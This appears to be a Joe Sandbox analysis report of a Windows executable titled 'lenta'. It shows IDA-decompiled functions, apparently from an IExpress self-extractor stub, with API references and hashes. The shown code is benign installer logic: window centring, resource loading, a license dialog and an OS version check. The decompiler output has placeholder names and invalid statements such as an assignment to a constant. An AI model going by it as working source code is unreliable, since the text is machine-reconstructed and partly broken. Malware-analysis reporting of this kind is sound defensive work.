                                                                        				struct HDC__* _t69;
                                                                        				int _t72;
                                                                        				signed int _t74;
                                                                        
                                                                        				_t63 = __edx;
                                                                        				_t29 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t29 ^ _t74;
                                                                        				_t68 = __edx;
                                                                        				_v44 = __ecx;
                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                        				_v48 = _v40.right - _v40.left;
                                                                        				GetWindowRect(_t68,  &_v24);
                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                        				_t69 = GetDC(_v44);
                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                        				ReleaseDC(_v44, _t69);
                                                                        				_t56 = _v48;
                                                                        				asm("cdq");
                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                        				_t67 = 0;
                                                                        				if(_t72 >= 0) {
                                                                        					_t63 = _v52;
                                                                        					if(_t72 + _t56 > _t63) {
                                                                        						_t72 = _t63 - _t56;
                                                                        					}
                                                                        				} else {
                                                                        					_t72 = _t67;
                                                                        				}
                                                                        				asm("cdq");
                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                        				if(_t59 >= 0) {
                                                                        					_t63 = _v60;
                                                                        					if(_t59 + _t53 > _t63) {
                                                                        						_t59 = _t63 - _t53;
                                                                        					}
                                                                        				} else {
                                                                        					_t59 = _t67;
                                                                        				}
                                                                        				return E003D6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                        			}

























                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 003D43F1
                                                                        • GetWindowRect.USER32(00000000,?), ref: 003D440B
                                                                        • GetDC.USER32(?), ref: 003D4423
                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 003D442E
                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 003D443A
                                                                        • ReleaseDC.USER32(?,00000000), ref: 003D4447
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 003D44A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                        • String ID:
                                                                        • API String ID: 2212493051-0
                                                                        • Opcode ID: 2f319a6d023729c65fed526d4947270317d8a8f0c82fd5f4db1cb71b530cb6db
                                                                        • Instruction ID: 820c477085c1dd515d70b738e17d407658cd4475acd39ae57501f887e5f7ca45
                                                                        • Opcode Fuzzy Hash: 2f319a6d023729c65fed526d4947270317d8a8f0c82fd5f4db1cb71b530cb6db
                                                                        • Instruction Fuzzy Hash: E6316472E01519AFCB15CFB8EE499EEBBB9EB89310F15416AF805F3240D6306C45CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E003D6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v28;
                                                                        				intOrPtr _v32;
                                                                        				struct HINSTANCE__* _v36;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				struct HRSRC__* _t21;
                                                                        				intOrPtr _t26;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr* _t40;
                                                                        				void* _t41;
                                                                        				intOrPtr* _t44;
                                                                        				intOrPtr* _t45;
                                                                        				void* _t47;
                                                                        				signed int _t50;
                                                                        				struct HINSTANCE__* _t51;
                                                                        
                                                                        				_t44 = __edx;
                                                                        				_t16 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t16 ^ _t50;
                                                                        				_t46 = 0;
                                                                        				_v32 = __ecx;
                                                                        				_v36 = 0;
                                                                        				_t36 = 1;
                                                                        				E003D171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                        				while(1) {
                                                                        					_t51 = _t51 + 0x10;
                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                        					if(_t21 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                        					if(_t45 == 0) {
                                                                        						 *0x3d9124 = 0x80070714;
                                                                        						_t36 = _t46;
                                                                        					} else {
                                                                        						_t5 = _t45 + 8; // 0x8
                                                                        						_t44 = _t5;
                                                                        						_t40 = _t44;
                                                                        						_t6 = _t40 + 1; // 0x9
                                                                        						_t47 = _t6;
                                                                        						do {
                                                                        							_t26 =  *_t40;
                                                                        							_t40 = _t40 + 1;
                                                                        						} while (_t26 != 0);
                                                                        						_t41 = _t40 - _t47;
                                                                        						_t46 = _t51;
                                                                        						_t7 = _t41 + 1; // 0xa
                                                                        						 *0x3da288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                        						_t30 = _v32();
                                                                        						if(_t51 != _t51) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						_push(_t45);
                                                                        						if(_t30 == 0) {
                                                                        							_t36 = 0;
                                                                        							FreeResource(??);
                                                                        						} else {
                                                                        							FreeResource();
                                                                        							_v36 = _v36 + 1;
                                                                        							E003D171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                        							_t46 = 0;
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					L12:
                                                                        					return E003D6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                        				}
                                                                        				goto L12;
                                                                        			}























                                                                        APIs
                                                                          • Part of subcall function 003D171E: _vsnprintf.MSVCRT ref: 003D1750
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,003D51CA,00000004,00000024,003D2F71,?,00000002,00000000), ref: 003D62CD
                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,003D51CA,00000004,00000024,003D2F71,?,00000002,00000000), ref: 003D62D4
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003D51CA,00000004,00000024,003D2F71,?,00000002,00000000), ref: 003D631B
                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 003D6345
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,003D51CA,00000004,00000024,003D2F71,?,00000002,00000000), ref: 003D6357
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                        • String ID: UPDFILE%lu
                                                                        • API String ID: 2922116661-2329316264
                                                                        • Opcode ID: 448bfa3907327fe45af31c2fcc451b6c929e1e4bf3ed7b6fb57a9a3a36fc2ce6
                                                                        • Instruction ID: 951989539752b059c7cc9eb473f1fb694c69c74d72d5ece7717929b41c1519ae
                                                                        • Opcode Fuzzy Hash: 448bfa3907327fe45af31c2fcc451b6c929e1e4bf3ed7b6fb57a9a3a36fc2ce6
                                                                        • Instruction Fuzzy Hash: 6721F676A00219ABDB129FA4EC469FE7B7CEB48710F01011BF912A3351DB359D068BE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D3A3F(void* __eflags) {
                                                                        				void* _t3;
                                                                        				void* _t9;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t16 = "LICENSE";
                                                                        				_t1 = E003D468F(_t16, 0, 0) + 1; // 0x1
                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                        				 *0x3d8d4c = _t3;
                                                                        				if(_t3 != 0) {
                                                                        					_t19 = _t16;
                                                                        					if(E003D468F(_t16, _t3, _t28) != 0) {
                                                                        						if(lstrcmpA( *0x3d8d4c, "<None>") == 0) {
                                                                        							LocalFree( *0x3d8d4c);
                                                                        							L9:
                                                                        							 *0x3d9124 = 0;
                                                                        							return 1;
                                                                        						}
                                                                        						_t9 = E003D6517(_t19, 0x7d1, 0, E003D3100, 0, 0);
                                                                        						LocalFree( *0x3d8d4c);
                                                                        						if(_t9 != 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						 *0x3d9124 = 0x800704c7;
                                                                        						L2:
                                                                        						return 0;
                                                                        					}
                                                                        					E003D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree( *0x3d8d4c);
                                                                        					 *0x3d9124 = 0x80070714;
                                                                        					goto L2;
                                                                        				}
                                                                        				E003D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0x3d9124 = E003D6285();
                                                                        				goto L2;
                                                                        			}







                                                                        APIs
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                          • Part of subcall function 003D468F: SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                          • Part of subcall function 003D468F: LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                          • Part of subcall function 003D468F: LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                          • Part of subcall function 003D468F: memcpy_s.MSVCRT ref: 003D46E5
                                                                          • Part of subcall function 003D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003D2F64,?,00000002,00000000), ref: 003D3A5D
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 003D3AB3
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                          • Part of subcall function 003D6285: GetLastError.KERNEL32(003D5BBC), ref: 003D6285
                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 003D3AD0
                                                                        • LocalFree.KERNEL32 ref: 003D3B13
                                                                          • Part of subcall function 003D6517: FindResourceA.KERNEL32(003D0000,000007D6,00000005), ref: 003D652A
                                                                          • Part of subcall function 003D6517: LoadResource.KERNEL32(003D0000,00000000,?,?,003D2EE8,00000000,003D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003D6538
                                                                          • Part of subcall function 003D6517: DialogBoxIndirectParamA.USER32(003D0000,00000000,00000547,003D19E0,00000000), ref: 003D6557
                                                                          • Part of subcall function 003D6517: FreeResource.KERNEL32(00000000,?,?,003D2EE8,00000000,003D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003D6560
                                                                        • LocalFree.KERNEL32(00000000,003D3100,00000000,00000000), ref: 003D3AF4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                        • String ID: <None>$LICENSE
                                                                        • API String ID: 2414642746-383193767
                                                                        • Opcode ID: b70d9d0c28ee3bde736f12d90ed2b6160f9bf4cb6894a86dc4f57b16a5027367
                                                                        • Instruction ID: b259d7ca63189fa236bb0c6bd0611e10d5d53cc545dc45477f115ec33324261e
                                                                        • Opcode Fuzzy Hash: b70d9d0c28ee3bde736f12d90ed2b6160f9bf4cb6894a86dc4f57b16a5027367
                                                                        • Instruction Fuzzy Hash: F611A232302201BBD723AB36BD0AE177BBEEBD5700F10442FB542DA7E0DA798D008661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E003D24E0(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t7;
                                                                        				void* _t20;
                                                                        				long _t26;
                                                                        				signed int _t27;
                                                                        
                                                                        				_t20 = __ebx;
                                                                        				_t7 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t7 ^ _t27;
                                                                        				_t25 = 0x104;
                                                                        				_t26 = 0;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					E003D658A( &_v268, 0x104, "wininit.ini");
                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                        					if(_t25 != 0xffffffff) {
                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                        						_lclose(_t25);
                                                                        					}
                                                                        				}
                                                                        				return E003D6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                        			}












                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 003D2506
                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 003D252C
                                                                        • _lopen.KERNEL32(?,00000040), ref: 003D253B
                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 003D254C
                                                                        • _lclose.KERNEL32(00000000), ref: 003D2555
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                        • String ID: wininit.ini
                                                                        • API String ID: 3273605193-4206010578
                                                                        • Opcode ID: 5fbf4047e80699490230568194738777ea5a8a082929047be9f28f9c149ae1ea
                                                                        • Instruction ID: 623d41ea979d1a01055dbf86f95c9a2fde7c27e3036437a2d6d67afb8ae0e3aa
                                                                        • Opcode Fuzzy Hash: 5fbf4047e80699490230568194738777ea5a8a082929047be9f28f9c149ae1ea
                                                                        • Instruction Fuzzy Hash: 3E01B5326011186BC7229B65FD0DEDFBB7DDB46750F000156FA49D3290DE748E45CAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E003D36EE(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _OSVERSIONINFOA _v416;
                                                                        				signed int _v420;
                                                                        				signed int _v424;
                                                                        				CHAR* _v428;
                                                                        				CHAR* _v432;
                                                                        				signed int _v436;
                                                                        				CHAR* _v440;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t72;
                                                                        				CHAR* _t77;
                                                                        				CHAR* _t91;
                                                                        				CHAR* _t94;
                                                                        				int _t97;
                                                                        				CHAR* _t98;
                                                                        				signed char _t99;
                                                                        				CHAR* _t104;
                                                                        				signed short _t107;
                                                                        				signed int _t109;
                                                                        				short _t113;
                                                                        				void* _t114;
                                                                        				signed char _t115;
                                                                        				short _t119;
                                                                        				CHAR* _t123;
                                                                        				CHAR* _t124;
                                                                        				CHAR* _t129;
                                                                        				signed int _t131;
                                                                        				signed int _t132;
                                                                        				CHAR* _t135;
                                                                        				CHAR* _t138;
                                                                        				signed int _t139;
                                                                        
                                                                        				_t72 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t72 ^ _t139;
                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                        				_t115 = __ecx;
                                                                        				_t135 = 0;
                                                                        				_v432 = __ecx;
                                                                        				_t138 = 0;
                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                        					_t133 = _v416.dwMajorVersion;
                                                                        					_t119 = 2;
                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                        					__eflags = _t77;
                                                                        					if(_t77 == 0) {
                                                                        						_t119 = 0;
                                                                        						__eflags = 1;
                                                                        						 *0x3d8184 = 1;
                                                                        						 *0x3d8180 = 1;
                                                                        						L13:
                                                                        						 *0x3d9a40 = _t119;
                                                                        						L14:
                                                                        						__eflags =  *0x3d8a34 - _t138; // 0x0
                                                                        						if(__eflags != 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						__eflags = _t115;
                                                                        						if(_t115 == 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						_v428 = _t135;
                                                                        						__eflags = _t119;
                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                        						_t11 =  &_v420;
                                                                        						 *_t11 = _v420 & _t138;
                                                                        						__eflags =  *_t11;
                                                                        						_v440 = _t115;
                                                                        						do {
                                                                        							_v424 = _t135 * 0x18;
                                                                        							_v436 = E003D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                        							_t91 = E003D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                        							_t123 = _v436;
                                                                        							_t133 = 0x54d;
                                                                        							__eflags = _t123;
                                                                        							if(_t123 < 0) {
                                                                        								L32:
                                                                        								__eflags = _v420 - 1;
                                                                        								if(_v420 == 1) {
                                                                        									_t138 = 0x54c;
                                                                        									L36:
                                                                        									__eflags = _t138;
                                                                        									if(_t138 != 0) {
                                                                        										L40:
                                                                        										__eflags = _t138 - _t133;
                                                                        										if(_t138 == _t133) {
                                                                        											L30:
                                                                        											_v420 = _v420 & 0x00000000;
                                                                        											_t115 = 0;
                                                                        											_v436 = _v436 & 0x00000000;
                                                                        											__eflags = _t138 - _t133;
                                                                        											_t133 = _v432;
                                                                        											if(__eflags != 0) {
                                                                        												_t124 = _v440;
                                                                        											} else {
                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                        												_v420 =  &_v268;
                                                                        											}
                                                                        											__eflags = _t124;
                                                                        											if(_t124 == 0) {
                                                                        												_t135 = _v436;
                                                                        											} else {
                                                                        												_t99 = _t124[0x30];
                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                        												__eflags = _t99 & 0x00000001;
                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                        													asm("sbb ebx, ebx");
                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                        												} else {
                                                                        													_t115 = 0x104;
                                                                        												}
                                                                        											}
                                                                        											__eflags =  *0x3d8a38 & 0x00000001;
                                                                        											if(( *0x3d8a38 & 0x00000001) != 0) {
                                                                        												L64:
                                                                        												_push(0);
                                                                        												_push(0x30);
                                                                        												_push(_v420);
                                                                        												_push("lenta");
                                                                        												goto L65;
                                                                        											} else {
                                                                        												__eflags = _t135;
                                                                        												if(_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												__eflags =  *_t135;
                                                                        												if( *_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												MessageBeep(0);
                                                                        												_t94 = E003D681F(_t115);
                                                                        												__eflags = _t94;
                                                                        												if(_t94 == 0) {
                                                                        													L57:
                                                                        													0x180030 = 0x30;
                                                                        													L58:
                                                                        													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                        													__eflags = _t115 & 0x00000004;
                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                        														__eflags = _t115 & 0x00000001;
                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                        															goto L66;
                                                                        														}
                                                                        														__eflags = _t97 - 1;
                                                                        														L62:
                                                                        														if(__eflags == 0) {
                                                                        															_t138 = 0;
                                                                        														}
                                                                        														goto L66;
                                                                        													}
                                                                        													__eflags = _t97 - 6;
                                                                        													goto L62;
                                                                        												}
                                                                        												_t98 = E003D67C9(_t124, _t124);
                                                                        												__eflags = _t98;
                                                                        												if(_t98 == 0) {
                                                                        													goto L57;
                                                                        												}
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags = _t138 - 0x54c;
                                                                        										if(_t138 == 0x54c) {
                                                                        											goto L30;
                                                                        										}
                                                                        										__eflags = _t138;
                                                                        										if(_t138 == 0) {
                                                                        											goto L66;
                                                                        										}
                                                                        										_t135 = 0;
                                                                        										__eflags = 0;
                                                                        										goto L44;
                                                                        									}
                                                                        									L37:
                                                                        									_t129 = _v432;
                                                                        									__eflags = _t129[0x7c];
                                                                        									if(_t129[0x7c] == 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t133 =  &_v268;
                                                                        									_t104 = E003D28E8(_t129,  &_v268, _t129,  &_v428);
                                                                        									__eflags = _t104;
                                                                        									if(_t104 != 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t135 = _v428;
                                                                        									_t133 = 0x54d;
                                                                        									_t138 = 0x54d;
                                                                        									goto L40;
                                                                        								}
                                                                        								goto L33;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							if(_t91 > 0) {
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _t123;
                                                                        							if(_t123 != 0) {
                                                                        								__eflags = _t91;
                                                                        								if(_t91 != 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                        								L27:
                                                                        								if(__eflags <= 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								L28:
                                                                        								__eflags = _t135;
                                                                        								if(_t135 == 0) {
                                                                        									goto L33;
                                                                        								}
                                                                        								_t138 = 0x54c;
                                                                        								goto L30;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							_t107 = _v416.dwBuildNumber;
                                                                        							if(_t91 != 0) {
                                                                        								_t131 = _v424;
                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                        									goto L37;
                                                                        								}
                                                                        								goto L28;
                                                                        							}
                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                        							_t109 = _v424;
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                        								goto L28;
                                                                        							}
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                        							goto L27;
                                                                        							L33:
                                                                        							_t135 =  &(_t135[1]);
                                                                        							_v428 = _t135;
                                                                        							_v420 = _t135;
                                                                        							__eflags = _t135 - 2;
                                                                        						} while (_t135 < 2);
                                                                        						goto L36;
                                                                        					}
                                                                        					__eflags = _t77 == 1;
                                                                        					if(_t77 == 1) {
                                                                        						 *0x3d9a40 = _t119;
                                                                        						 *0x3d8184 = 1;
                                                                        						 *0x3d8180 = 1;
                                                                        						__eflags = _t133 - 3;
                                                                        						if(_t133 > 3) {
                                                                        							__eflags = _t133 - 5;
                                                                        							if(_t133 < 5) {
                                                                        								goto L14;
                                                                        							}
                                                                        							_t113 = 3;
                                                                        							_t119 = _t113;
                                                                        							goto L13;
                                                                        						}
                                                                        						_t119 = 1;
                                                                        						_t114 = 3;
                                                                        						 *0x3d9a40 = 1;
                                                                        						__eflags = _t133 - _t114;
                                                                        						if(__eflags < 0) {
                                                                        							L9:
                                                                        							 *0x3d8184 = _t135;
                                                                        							 *0x3d8180 = _t135;
                                                                        							goto L14;
                                                                        						}
                                                                        						if(__eflags != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                        							goto L14;
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					_t138 = 0x4ca;
                                                                        					goto L44;
                                                                        				} else {
                                                                        					_t138 = 0x4b4;
                                                                        					L44:
                                                                        					_push(_t135);
                                                                        					_push(0x10);
                                                                        					_push(_t135);
                                                                        					_push(_t135);
                                                                        					L65:
                                                                        					_t133 = _t138;
                                                                        					E003D44B9(0, _t138);
                                                                        					L66:
                                                                        					return E003D6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                        				}
                                                                        			}

                                                                        0x00000000
                                                                        0x003d3881
                                                                        0x003d3859
                                                                        0x003d385c
                                                                        0x003d3862
                                                                        0x003d3866
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3868
                                                                        0x00000000
                                                                        0x003d38f4
                                                                        0x003d38f4
                                                                        0x003d38f5
                                                                        0x003d38fb
                                                                        0x003d3901
                                                                        0x003d3901
                                                                        0x00000000
                                                                        0x003d390a
                                                                        0x003d374b
                                                                        0x003d374e
                                                                        0x003d375c
                                                                        0x003d3764
                                                                        0x003d3769
                                                                        0x003d376e
                                                                        0x003d3771
                                                                        0x003d379c
                                                                        0x003d379f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d37a3
                                                                        0x003d37a4
                                                                        0x00000000
                                                                        0x003d37a4
                                                                        0x003d3773
                                                                        0x003d3777
                                                                        0x003d3778
                                                                        0x003d377f
                                                                        0x003d3781
                                                                        0x003d378e
                                                                        0x003d378e
                                                                        0x003d3794
                                                                        0x00000000
                                                                        0x003d3794
                                                                        0x003d3783
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3785
                                                                        0x003d378c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d378c
                                                                        0x003d3750
                                                                        0x00000000
                                                                        0x003d372d
                                                                        0x003d372d
                                                                        0x003d396b
                                                                        0x003d396b
                                                                        0x003d396c
                                                                        0x003d396e
                                                                        0x003d396f
                                                                        0x003d3a1e
                                                                        0x003d3a1e
                                                                        0x003d3a22
                                                                        0x003d3a27
                                                                        0x003d3a3e
                                                                        0x003d3a3e

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 003D3723
                                                                        • MessageBeep.USER32(00000000), ref: 003D39C3
                                                                        • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 003D39F1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Message$BeepVersion
                                                                        • String ID: 3$lenta
                                                                        • API String ID: 2519184315-4216304122
                                                                        • Opcode ID: 8661249794681c17089e7e3c53711821824cea660553771cf7ed45913cc2b07c
                                                                        • Instruction ID: c245330de14f665de6bc14e1c80afcf2108907fe178dc6531a9c451b5d443cdc
